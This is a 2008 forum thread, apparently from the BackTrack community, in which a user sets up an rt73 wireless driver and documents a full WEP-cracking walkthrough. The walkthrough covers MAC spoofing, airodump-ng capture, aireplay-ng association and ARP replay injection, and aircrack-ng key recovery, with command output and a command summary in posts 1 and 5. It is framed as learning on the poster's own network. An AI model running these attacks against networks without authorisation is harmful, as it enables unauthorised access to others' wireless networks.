Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: How do I connect to the internet using the shell?

  1. #1
    Junior Member
    Join Date
    May 2008
    Posts
    38

    Default How do I connect to the internet using the shell?

    How do I connect to the internet using the shell commands?

    Why:
    I have tried the " wireless assistant " and it continues to drop, and reconnect to the internet randomly.
    After some research, I have discovered that the " wireless assistant " isn't totally reliable.

    The Hardware:
    I have a internal Intel ipw2200 type card on my Toshiba M60 Laptop, and I have a external dongle Wusb54GC.
    Note, because the version number was not shown on this device I am assuming that the Wusb54gc must be version 1.

    The Software:
    First, I checked if my Wusb54gc was compatible on the wiki:
    Notice, I downloaded rt73 version three for better performance:
    I unzipped this file into the bt ~ # (root) directory.
    Then I opened a shell and installed the file using the following commands:

    Code:
    bt Desktop # cd /root/
    bt ~ #  ls
    Desktop/ sample_scripts/  rt73-k2wrlz-3.0.0.tar.bz2 rt73-k2wrlz-3.0.0/ 
    bt ~ # cd  rt73-k2wrlz-3.0.0/
    bt rt73-k2wrlz-3.0.0 #  ls
    CHANGELOG  FAQ  LICENSE  Module/  README  THANKS
    bt rt73-k2wrlz-3.0.0 # cd Module 
    bt Module #  make 
    *** Module rt73.ko built successfully
    bt Module # make install 
    *** Update /etc/modprobe.d/ralink alias for wlan*
    *** Install firmware in /lib/firmware ...
    *** Check old config ...
    The goal:
    The goal is to be able to surf remote-exploit.org using the internal ( eth1, Intel ipw2200 interface ) for the following reasons.
    One, so I can create activity and see the results when my ( rausb0, wusb54gc ) interface detects that activity.
    Two, so I can apply what I have learned while surfing; to a ( rausb0, wusb54gc ) interface in at the same time.

    CONFIGURE THE INTERNAL INTEL WIRELESS CARD IN MANAGED MODE (SHELL ONE)


    bt ~ # iwconfig

    eth1......unassociated ESSID:off/any
    ............Mode:Managed Channel=0 Access Point: Not-Associated

    rausb0....RT73 WLAN ESSID:""
    ............Mode:Managed Frequency=2.412 GHz Bit Rate=54 Mb/s

    ............FYI: If your essid has a space or a quote, then you must use quotes and a \ for example, 3345 66'54 would become: essid "3345\ 66\'54"

    bt ~ # rm /etc/dhcpc/*
    bt ~ # iwconfig eth1 essid 'edoctoor'
    bt ~ # iwconfig eth1 enc 01234567890123456789055555
    bt ~ # iwconfig eth1 channel 6
    bt ~ # iwconfig eth1 mode managed
    bt ~ # ifconfig eth1 up
    bt ~ # dhcpcd -d -n eth1
    bt ~ # iwconfig eth1

    eth1......IEEE 802.11g ESSID:"edoctoor"
    ............Mode:Managed Frequency:2.437 GHz Access Point: AA:BB:CC:DD:EE:FF
    ............Encryption key:0123-4567-8901-2345-6789-0555-55 Security mode:open

    SUCCESS YOU CAN NOW SURF THE INTERNET!

    CONFIGURE THE WUSB54GC IN MONITOR MODE (SHELL ONE)

    I have the Wusb54GC plugged in when the computer booted/started.
    (Please offer your thoughts on this if you wish)

    bt ~ # modprobe rt73
    bt ~ # macchanger --mac 00:11:22:33:44:55 rausb0
    bt ~ # iwconfig rausb0 mode monitor
    bt ~ # ifconfig rausb0 up
    bt ~ # iwconfig
    eth1......IEEE 802.11g ESSID:"edoctoor"
    ............Mode:Managed Frequency:2.437 GHz Access Point: AA:BB:CC:DD:EE:FF
    ............Encryption key:0123-4567-8901-2345-6789-0555-55 Security mode:open
    rausb0...RT73 WLAN ESSID:""
    ............Mode:Monitor Frequency=2.412 GHz Bit Rate=54 Mb/s

    SUCCESS GOAL ACHIEVED

    ............FYI: To return to Managed mode; bt ~ # iwconfig rausb0 mode managed

    AIRODUMPING CREATES DATA IN THE CURRENT DIRECTORY (SHELL ONE)

    Extra information; for this example, I created a data directory:
    Important:
    All the following commands must be run from the same directory; because, the
    bt data # airodump-ng -c 6 -w edocwep --bssid 11:11:11:11:11:11 rausb0
    command creates many file(s) named edocwep-01.cap edocwep-01.txt,,,, edocwep-02.cap edocwep-02.txt.. in the directory where the command was run. In this case the resulting files would be created in the data directory.

    The
    bt data # aireplay-ng -3 -b 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0
    command creates a replay_arp-0529-184518.cap
    file in the data directory.

    Finally the following command requires the pre-mentioned file(s) to be located in the data directory.

    bt data # aircrack-ng -n 128 -0 --bssid 11:11:11:11:11:11 edocwep*.cap

    Note: The "*" is considered as a wildcard; the "*" is used to tell the aircrack-ng command to include all files that start with "edocwep".

    If your still confused type "ls", ( The LIST command ) to see files created:
    bt data # ls
    bt ~ # cd Desktop
    bt Desktop # mkdir data
    <<<<< ONE TIME ONLY >>>>>
    bt Desktop # cd data

    bt data # airodump-ng rausb0
    ........CH 1 ][ Elapsed: 2 mins ][ 2008-05-29 17:29
    ........BSSID..............PWR..Beacons....#Data,.#/s..CH..MB..ENC..CIPHER AUTH ESSI
    ........11:11:11:11:11:11..78...91..........169....0....6..54..WEP..WEP.... .....EDocTooR

    Press the ( Ctrl + C ) keys at the same time to stop the command in the active window.
    Select the BSSID so that it may be copied into the next command.
    bt data # airodump-ng -c 6 -w edocwep --bssid 11:11:11:11:11:11 rausb0
    Note: edocwep is a file name that I made up.

    ........BSSID..............STATION.............PWR ..Rate...Lost.....Packets Probes
    ........11:11:11:11:11:11 22:22:22:22:22:22 80 54-54 0 176

    Press the ( Ctrl + C ) keys at the same time to stop the command in the active window.
    Select the BSSID and the STATION so it may be copied into the next command.
    (Press up arrow) to recall the last command in history resulting in:
    bt data # airodump-ng -c 6 -w edocwep --bssid 11:11:11:11:11:11 rausb0

    Tip, open your browser for instant results

  2. #2
    Junior Member drwalter's Avatar
    Join Date
    Mar 2008
    Posts
    88

    Default

    Quote Originally Posted by ««EDocTooR»» View Post
    How do I connect to the internet using the shell commands?
    Ipw2200 shows up as wlan0 i believe (type iwconfig to verify)
    #iwconfig wlan0 essid yourhiddenessidhere
    #iwconfig wlan0 enc yourwepkeyhere
    #iwconfig wlan0 channel correctchannel
    #dhcpcd wlan0

    Quote Originally Posted by ««EDocTooR»» View Post
    I have a second external Wusb54GC dongle (Driver installed as per Wiki)
    and I was hoping to get the commands to inject to my same
    wireless router using the dongle and pinging my wireless router
    with my Intel. Pinging, or surfing this forum with the Intel and
    testing what I have learned on the dongle. I hope this makes sense. ;-)
    Kinda confusing question... what are you trying to inject? what version is the wusb54gc(more important than previous question, I'm pretty sure a few of the versions dont support injection)?

    assuming it works I'm pretty sure that's an rt73 driver so iwconfig should show it as rausb0 if it was plugged in before boot. Otherwise...
    #modprobe rt73
    #iwconfig rausb0
    You should see rausb0 there. if not...
    #ifconfig rausb0 up
    #iwconfig rausb0
    Secondly, injection is done in monitor mode so...
    #iwconfig rausb0 mode monitor

    After this it depends on what you're trying to inject. Are you trying to break your own wep? If so an easy way to start is with the aircrack-ng series... tons and tons of posts on this. I know -=Xploitz=- has more than a couple videos on how to do it and tags at least one of them in his signatures.
    ================================================== ===
    Dr. Walter - Depraved linguist, Benevolent troublemaker extraordinaire
    ================================================== ===

  3. #3
    Junior Member aggtrfrad's Avatar
    Join Date
    Apr 2008
    Posts
    74

    Default

    this can help
    http://www.yourdailymedia.com/media/...f_The_Internet
    (sorry... i couldnt resist)
    -Google is watching you

    -June 1, 2001, Microsoft CEO Steve Ballmer: "Linux is a cancer that attaches itself in an intellectual property sense to everything it touches."

  4. #4
    Junior Member drwalter's Avatar
    Join Date
    Mar 2008
    Posts
    88

    Default

    That was unbelievably hilarious
    ================================================== ===
    Dr. Walter - Depraved linguist, Benevolent troublemaker extraordinaire
    ================================================== ===

  5. #5
    Junior Member
    Join Date
    May 2008
    Posts
    38

    Default How do I install a module for my Linksys WUSB54GC?

    AIREPLAYING TAUNTS THE CLIENT TO SPIT IT OUT (SHELL TWO)

    OPEN A NEW SHELL
    bt ~ # cd Desktop
    bt Desktop # cd data
    bt data # aireplay-ng -1 0 -a 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0
    ........17:38:15 Association successful :-)
    bt data # aireplay-ng -3 -b 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0
    ........Saving ARP requests in replay_arp-0529-184518.cap
    ........Read 3116902 packets (got 2319979 ARP requests and 0 ACKs), sent 1750272 packets...(499 pps)

    Tips and tricks of the command line
    Code:
    bt data # aireplay-ng -1 0 -a < Right click to paste BSSID AND STATION here >
    bt data # aireplay-ng -1 0 -a 11:11:11:11:11:11 22:22:22:22:22:22
    Press the left arrow 18 times, space -h, right arrow 18 times, space
    bt data # aireplay-ng -1 0 -a 11:11:11:11:11:11 -h 22:22:22:22:22:22 
    Type: rausb0
    bt data # aireplay-ng -1 0 -a 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0
    Enter
    16:12:20  Association successful :-)
    Press up arrow
    bt data # aireplay-ng -1 0 -a 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0 
    Press left arrow 52 times, type: 3 -b, press the delete key six times
    bt data #  aireplay-ng -3   -b 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0
    Enter
    (Tip, open your browser for instant results) hopefully you will see

    Read 15834 packets (got 6609 ARP requests and 0 ACKs), sent 10001 packets...(499 pps
    Read 15876 packets (got 6633 ARP requests and 0 ACKs), sent 10052 packets...(499 pps
    Read 15934 packets (got 6667 ARP requests and 0 ACKs), sent 10102 packets...(499 pps

    AIRCRACKING DOING THE MATH (SHELL THREE)

    OPEN A NEW SHELL
    bt ~ # cd Desktop
    bt Desktop # cd data

    Note: To add colour use the "-0" option, "-0" is a Zero

    bt data # aircrack-ng -n 128 -0 --bssid 11:11:11:11:11:11 edocwep*.cap

    Code:
                                     Aircrack-ng 1.0 beta1 r857
    
    
                     [00:00:00] Tested 767 keys (got 35504 IVs)
    
       KB    depth   byte(vote)
        0    3/  5   B4(42496) 40(42240) 12(41472) 27(41472) A3(41472)
        1    1/  3   CD(43008) C7(42752) B6(42240) 23(41984) 1B(41728)
        2   18/  2   CD(39680) 03(39424) 51(39424) 59(39424) D3(39424)
        3    0/  1   99(53760) 85(42496) 6A(41984) DC(41472) F9(41472)
        4   12/  4   98(40704) 9E(40192) B0(40192) E4(40192) D3(39936)
    
                 KEY FOUND! [ 01:23:45:67:89:01:23:45:67:89:05:55:55 ]
            Decrypted correctly: 100%

    JUST THE COMMANDS


    Shell one:
    Code:
    bt data # rm /etc/dhcpc/*
    bt data # iwconfig eth1 essid edoctoor
    bt data # iwconfig eth1 enc 01234567890123456789055555
    bt data # iwconfig eth1 channel 6
    bt data # iwconfig eth1 mode managed
    bt data # ifconfig eth1 up
    bt data # dhcpcd eth1
    bt data # modprobe rt73
    bt data # macchanger --mac 00:11:22:33:44:55 rausb0
    bt data # iwconfig rausb0 mode monitor
    bt data # ifconfig rausb0 up
    bt data # airodump-ng rausb0
    bt data # airodump-ng -c 6 -w edocwep --bssid 11:11:11:11:11:11 rausb0
    Shell two:
    Code:
    bt data # aireplay-ng -1 0 -a 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0
    bt data # aireplay-ng -3   -b 11:11:11:11:11:11 -h 22:22:22:22:22:22 rausb0
    Shell three:
    Code:
    bt data # aircrack-ng -n 128 -0 --bssid 11:11:11:11:11:11 edocwep*.cap
    ««EDocTooR»»

  6. #6
    Junior Member
    Join Date
    May 2008
    Posts
    38

    Default

    This is a stub where Dlink Cardbus command will be...
    for the Noobs that have DLink Cardbus

    I Thank all of you for helping me get this far, you know who you are, and thanks.

    Because I am use to Window (R) I am used to the Operating system to install and configure all devices; as a result,
    I have searched for hours only to discover that the information was all here.

    It is my hopes to save many people weeks of confusion.

    I know that I have created this stub, and that it isn't normally a good practice; however,
    if you lets me finish this, you will see that the end product will be a clear and overwhelmingly detailed
    thread that some noobs will hopefully find useful.

    If you stop me, I'll bow my head and back away respectfully.

  7. #7
    Junior Member
    Join Date
    May 2008
    Posts
    38

    Default rt73 details and configuration

    This is a stub which will detail rt73 version Three configuration:

    * Auto-load on boot

    If you want your device to come up on boot the best is to use your
    specific linux distribution's tools (boot scripts, etc).
    If you need support doing so, ask on your distro's support media.

    * wpa_supplicant

    wpa_supplicant is a userland WPA/WPA2/802.1X layer. This driver is
    not compatible with it.
    As most wpa_supplicant features are
    embedded into our driver, you should not need it though.
    If you need to use a feature that only wpa_supplicant provides:
    - either use our next-generation rt2x00 driver which
    is compatible with wpa_supplicant
    - or patch wpa_supplicant to make it work with rt73 (more info:

  8. #8
    Junior Member greyspace's Avatar
    Join Date
    May 2008
    Posts
    61

    Default

    Don't worry EDoctoor, I'll PM you so this thread will a good flow of content. lol

    So what is the difference between the next-generation rt2x00 driver
    and the rt73?

  9. #9
    Junior Member
    Join Date
    May 2008
    Posts
    71

    Default

    Mooooom! I wanna be a master of da internet! That would be kewl

  10. #10
    Junior Member
    Join Date
    May 2008
    Posts
    38

    Default

    Thank you J05HUA for your valued content.

    Hopefully, I'll figure out how to a line to text file of the command and a chmod it to create a Batch file.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •